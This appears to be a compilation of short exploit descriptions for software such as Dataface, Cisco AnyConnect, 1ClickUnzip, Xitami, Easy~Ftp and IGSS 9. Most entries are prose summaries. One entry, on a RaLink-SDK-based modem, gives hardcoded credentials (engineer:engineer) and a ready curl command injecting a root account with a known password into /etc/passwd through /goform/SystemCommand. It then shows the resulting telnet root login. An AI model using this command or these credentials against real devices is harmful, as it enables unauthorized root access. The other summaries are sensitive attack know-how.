The Dataface portal contains a Local File Inclusion (LFI) vulnerability. An attacker can exploit it by sending a crafted HTTP request with maliciously crafted parameters to the vulnerable server, which can allow the attacker to read sensitive files from the server, such as /etc/passwd.
This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the 'url' property, which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified in the 'url' property; one of these files is stored in a temporary directory and executed.
1ClickUnzip 3.00 contains a heap overflow vulnerability that is triggered when processing specially crafted .ZIP files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.
Without prior authentication, if the 'allowDownload' option is enabled in config.php (meaning that tarball download is allowed across all repositories, which is not uncommon), an attacker can invoke the dl.php script with a well-formed 'path' argument to execute arbitrary commands against the underlying operating system.
This exploit targets Xitami Web Server 2.5b4. It is a remote buffer overflow exploit, tested on Windows XP Pro English with Service Pack 3. The exploit was written by mr.pr0n and the bug was discovered by Krystian Kloskowski (h07). The exploit is run by setting up a listener and then entering the target's IP address.
The box uses a modified version of the RaLink SDK. The standard web interface is accessed via HTTP.
1) The web administration interface can be accessed with the standard user/password pair admin:admin. This can later be changed, but there is another access pair, engineer:engineer, which cannot be changed via the web interface.
2) Some of the SDK standard scripts are left in place and their screens in the web interface are merely HTML-commented. This reveals the /goform/SystemCommand method.
Remote add r00t user with password boza:
$curl --basic -u "engineer:engineer" -d "command=echo -e "r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh" >> /etc/passwd;&SystemCommandSubmit=Apply" 192.168.100.254/goform/SystemCommand
$telnet 192.168.100.254
Trying 192.168.100.254...
Connected to 192.168.100.254.
modacom login: r00t
Password: boza
BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
This module exploits a vulnerability in the Golden FTP service. This module uses the PASS command to trigger the overflow.
A buffer overflow vulnerability exists in Easy~Ftp Server v1.7.0.2 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is triggered when a malicious user sends a specially crafted MKD command with an overly long string, which overflows the buffer and overwrites the SEH handler.
This exploit allows an attacker to bypass authentication and flood a Brother HL-5370DW series printer with pages.
This module exploits multiple vulnerabilities found in IGSS 9's Data Server and Data Collector services. The approach is first to transfer our binary with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then to send an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which causes dc.exe to run that payload via a CreateProcessA() call as a new thread.